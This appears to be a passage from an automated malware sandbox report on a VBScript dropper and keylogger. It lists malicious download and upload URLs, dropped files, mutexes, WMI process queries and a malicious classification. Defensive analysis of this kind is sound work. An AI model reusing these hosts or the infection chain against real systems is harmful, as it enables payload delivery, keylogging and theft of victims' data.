0f 33 46 f7 8d 99 d7 ce e1 98 e5 d1 df ff 5c 26 57 53 88 11 8d cd ef 5d a0 29 76 1b a4 6b ff b8 c3 ab 50 3e 8c 8d 50 4f 51 b6 45 93 b7 ba 4c db db 37 a2 65 41 0f 83 c9 69 7d d9 e1 c6 45 5b c3 ec 57 91 94 9e ea 20 b5 13 14 5d 20 86 52 38 ce 44 3f 78 ba 4e 7b 87 be ef 5c cf ef b3 bd b6 14 7c 75 a8 19 ea a1 33 60 91 3d 47 44 48 8f 1c a1 99 70 9e 17 cd ee 1c 34 d3 c3 9f 3f c2 39 7d 70 fc d2 5a 3c 78 df 36 3f 54 02 4d 31 ae 85 08 35 be 5d 87 fc 98 8b 5d e1 56 be 00 a2 2f 77 8c 75 9e e3 3b f5

Source: wscript.exe, 0000000D.00000002.2188898352.000002397B800000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.2188853081.0000023979D95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2186796488.00000239799FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2187817404.0000023979A2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2187575679.0000023979A1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://64.95.10.38/contador/index.php?nomepc=
Source: wscript.exe	String found in binary or memory: http://64.95.10.38/contador/index.php?nomepc=user-PC
Source: wscript.exe, 0000000D.00000003.2187024924.0000023979A15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2186796488.00000239799FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://64.95.10.38/contador/index.php?nomepc=user-PC_Classes
Source: wscript.exe, wscript.exe, 00000009.00000003.2264836042.0000028C4246E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2261100241.0000028C4246E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2187733558.0000023979A1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2187024924.0000023979A15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.2188898352.000002397B800000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.2188853081.0000023979D95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2186796488.00000239799FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2187817404.0000023979A2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2187575679.0000023979A1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://64.95.10.38/wewewe.zip
Source: wscript.exe, 0000000D.00000003.2187733558.0000023979A1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2187024924.0000023979A15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2186796488.00000239799FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.2188760179.0000023979A1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2187575679.0000023979A1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://64.95.10.38/wewewe.zip5EE
Source: wscript.exe, 0000000D.00000002.2188898352.000002397B800000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://64.95.10.38/wewewe.zipj
Source: BLOCKBUSTER.exe, 0000000E.00000002.2393941031.0000000008AC0000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://70.34.247.142/UPLOADMAISL.phpU
Source: wscript.exe, 00000009.00000003.2317204708.0000028C4A9B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA.crl0q
Source: wscript.exe, 00000009.00000003.2317204708.0000028C4A9B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0&
Source: BLOCKBUSTER.exe, 0000000E.00000002.2567585344.00000000122FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://worldtimeapi.org/api/ip
Source: BLOCKBUSTER.exe, 0000000E.00000002.2390916545.0000000000EE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://worldtimeapi.org/api/ip=C:
Source: BLOCKBUSTER.exe, 0000000E.00000000.2320054758.0000000000B31000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.embarcadero.com/products/delphi
Source: BLOCKBUSTER.exe, 0000000E.00000002.2391963880.0000000002A86000.00000004.00001000.00020000.00000000.sdmp, BLOCKBUSTER.exe, 0000000E.00000000.2320054758.0000000000B31000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.foolabs.com/xpdf
Source: BLOCKBUSTER.exe, 0000000E.00000000.2320054758.0000000000B31000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.ghisler.com/plugins.htm
Source: BLOCKBUSTER.exe, 0000000E.00000002.2542791110.000000000A22F000.00000004.00001000.00020000.00000000.sdmp, BLOCKBUSTER.exe, 0000000E.00000002.2393941031.000000000913A000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: BLOCKBUSTER.exe, 0000000E.00000002.2393941031.0000000008AC0000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.pngui.com/%E8%B4%AD%E4%B9%B0ordersU
Source: wscript.exe, 00000009.00000003.2317204708.0000028C4A9B3000.00000004.00000020.00020000.00000000.sdmp, BLOCKBUSTER.exe, 0000000E.00000000.2320054758.0000000000B31000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.scootersoftware.com.
Source: BLOCKBUSTER.exe, 0000000E.00000000.2318778494.0000000000401000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.scootersoftware.com/
Source: BLOCKBUSTER.exe, 0000000E.00000000.2320054758.0000000000B31000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.scootersoftware.com/bugRepMailer.php
Source: BLOCKBUSTER.exe, 0000000E.00000000.2318778494.0000000000401000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.scootersoftware.com/buynow?bld=%d
Source: BLOCKBUSTER.exe, 0000000E.00000000.2318778494.0000000000401000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.scootersoftware.com/buynow?bld=%dS
Source: BLOCKBUSTER.exe, 0000000E.00000000.2318778494.0000000000401000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.scootersoftware.com/checkupdates.php?product=bc3&minor=
Source: BLOCKBUSTER.exe, 0000000E.00000000.2318778494.0000000000401000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.scootersoftware.com/download.php
Source: BLOCKBUSTER.exe, 0000000E.00000000.2318778494.0000000000401000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.scootersoftware.com/download.phpS
Source: BLOCKBUSTER.exe, 0000000E.00000000.2320054758.0000000000B31000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.scootersoftware.com/support.php
Source: BLOCKBUSTER.exe, 0000000E.00000002.2391963880.0000000002B73000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.scootersoftware.com/upgrade
Source: BLOCKBUSTER.exe, 0000000E.00000002.2390916545.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.scootersoftware.com/upgrade0
Source: BLOCKBUSTER.exe, 0000000E.00000002.2390916545.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.scootersoftware.com/upgradee/
Source: BLOCKBUSTER.exe, 0000000E.00000002.2390916545.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.scootersoftware.com/upgradeite
Source: BLOCKBUSTER.exe, 0000000E.00000000.2320054758.0000000000B31000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.scootersoftware.com/v3formats
Source: BLOCKBUSTER.exe, 0000000E.00000000.2318778494.0000000000401000.00000020.00000001.01000000.00000009.sdmp, BLOCKBUSTER.exe, 0000000E.00000002.2391963880.0000000002B73000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.secureblackbox.com
Source: BLOCKBUSTER.exe, 0000000E.00000000.2320054758.0000000000B31000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.totalcmd.net/directory/packer.html
Source: wscript.exe, 00000000.00000002.2266227962.00000220D3A95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2266323721.00000220D5800000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://endesa.cli
Source: wscript.exe, 00000000.00000002.2266227962.00000220D3A95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://endesa.clic
Source: curl.exe, 00000004.00000002.2176558506.000001C44D390000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.2175100622.000001C44D3C9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.2176650798.000001C44D3CA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.2175431467.000001C44D3CA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.2176558506.000001C44D398000.00000004.00000020.00020000.00000000.sdmp, 672365339196e.vbs	String found in binary or memory: https://endesa.click/672365339188b/6723653391970.vbs
Source: curl.exe, 00000004.00000002.2176558506.000001C44D390000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://endesa.click/672365339188b/6723653391970.vbsWinsta0
Source: curl.exe, 00000004.00000002.2176558506.000001C44D390000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://endesa.click/672365339188b/6723653391970.vbscurl
Source: curl.exe, 00000004.00000003.2175100622.000001C44D3C9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.2176650798.000001C44D3CA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.2175431467.000001C44D3CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://endesa.click/672365339188b/6723653391970.vbs~E

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown

HTTPS traffic detected: 68.65.122.45:443 -> 192.168.2.6:49712 version: TLS 1.2

Yara detected Keylogger Generic

Source: Yara match

File source: Process Memory Space: BLOCKBUSTER.exe PID: 4828, type: MEMORYSTR

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}	Jump to behavior

Contains functionality to communicate with device drivers

Source: C:\_672365339188b\BLOCKBUSTER.exe

Code function: 14_2_6FCDBB30: CreateFileW,DeviceIoControl,CloseHandle,

14_2_6FCDBB30

Detected potential crypto function

Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCD4FF0	14_2_6FCD4FF0
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE6750	14_2_6FCE6750
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCD9650	14_2_6FCD9650
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE8D30	14_2_6FCE8D30
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE04C0	14_2_6FCE04C0
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCDF480	14_2_6FCDF480
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCD5400	14_2_6FCD5400
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE43C0	14_2_6FCE43C0
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE83E0	14_2_6FCE83E0
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE0380	14_2_6FCE0380
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE03A4	14_2_6FCE03A4
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE0BA0	14_2_6FCE0BA0
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCD4BB0	14_2_6FCD4BB0
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCD4B20	14_2_6FCD4B20
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE0200	14_2_6FCE0200
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE8A20	14_2_6FCE8A20
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCD11E0	14_2_6FCD11E0
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE78E0	14_2_6FCE78E0
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE98E0	14_2_6FCE98E0
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCED85C	14_2_6FCED85C
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCD5850	14_2_6FCD5850
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCDE87E	14_2_6FCDE87E

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\hcx.dll 3976547348F3CD6887AD0BC6A1F1F54010B58CA5CC1A77A937E882DEF475AB9E
Source: Joe Sandbox View	Dropped File: C:\_672365339188b\BLOCKBUSTER.exe 1D822B3FAABB8F65FC30076D32A95757A2C369CCB64AE54572E9F562280AE845
Source: Joe Sandbox View	Dropped File: C:\_672365339188b\unrar.dll 2631FCDF920610557736549E27939B9C760743A2CDDEC0B2C2254CFA40003FB0

Found potential string decryption / allocating functions

Source: C:\_672365339188b\BLOCKBUSTER.exe

Code function: String function: 6FCEDE20 appears 37 times

Java / VBScript file with very long strings (likely obfuscated code)

Source: 672365339196e.vbs

Initial sample: Strings found which are bigger than 50

PE file contains executable resources (Code or Archives)

Source: 7zxa.dll.9.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: BLOCKBUSTER.exe.9.dr	Static PE information: Resource name: RT_RCDATA type: Delphi compiled form '\031TVfsArchivePasswordDialog\030VfsArchivePasswordDialog\004Left\003\207\001\003Top\003\260\001\013BorderWidth\002\010\007Caption\006\016Enter Password\014ClientHeight\003\202'

Source: BLOCKBUSTER.exe, 0000000E.00000002.2391963880.0000000002AE2000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: .bas;.cls;.ctl;.frm;.vb;.vbp;*.vbs
Source: BLOCKBUSTER.exe, 0000000E.00000002.2556013151.000000000B4EC000.00000004.00001000.00020000.00000000.sdmp, BLOCKBUSTER.exe, 0000000E.00000000.2320054758.0000000000B31000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: <Mask Value=".bas;.cls;.ctl;.frm;.vb;.vbp;*.vbs"/>
Source: BLOCKBUSTER.exe, 0000000E.00000002.2391963880.0000000002AE2000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: (.bas;.cls;.ctl;.frm;.vb;.vbp;*.vbs

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@128/11@9/5

Source: C:\_672365339188b\BLOCKBUSTER.exe

Code function: 14_2_6FCD8830 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,

14_2_6FCD8830

Source: C:\Windows\System32\curl.exe

File created: C:\Users\Public\6723653391970.vbs

Jump to behavior

Source: C:\_672365339188b\BLOCKBUSTER.exe	Mutant created: \Sessions\1\BaseNamedObjects\BeyondCompare3
Source: C:\_672365339188b\BLOCKBUSTER.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:516:120:WilError_03
Source: C:\_672365339188b\BLOCKBUSTER.exe	Mutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_4828
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1436:120:WilError_03
Source: C:\_672365339188b\BLOCKBUSTER.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\BeyondCompare3
Source: C:\_672365339188b\BLOCKBUSTER.exe	Mutant created: \Sessions\1\BaseNamedObjects\madToolsMsgHandlerMutex$46c$432c4c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3976:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5860:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2248:120:WilError_03
Source: C:\_672365339188b\BLOCKBUSTER.exe	Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$12dc
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1336:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4548:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5248:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
Source: C:\_672365339188b\BLOCKBUSTER.exe	Mutant created: \Sessions\1\BaseNamedObjects\Beyond Compare: BE887BC7-16B2-48B5-B618-B3A52A26EC10
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5912:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4256:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6748:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2788:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:120:WilError_03

Source: C:\_672365339188b\BLOCKBUSTER.exe

File created: C:\Users\user\AppData\Local\Temp\BLOCKBUSTER.madExcept

Jump to behavior

Source: Yara match	File source: 14.0.BLOCKBUSTER.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.2318778494.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY

Source: C:\_672365339188b\BLOCKBUSTER.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\672365339196e.vbs"

Source: C:\_672365339188b\BLOCKBUSTER.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "BLOCKBUSTER.exe")
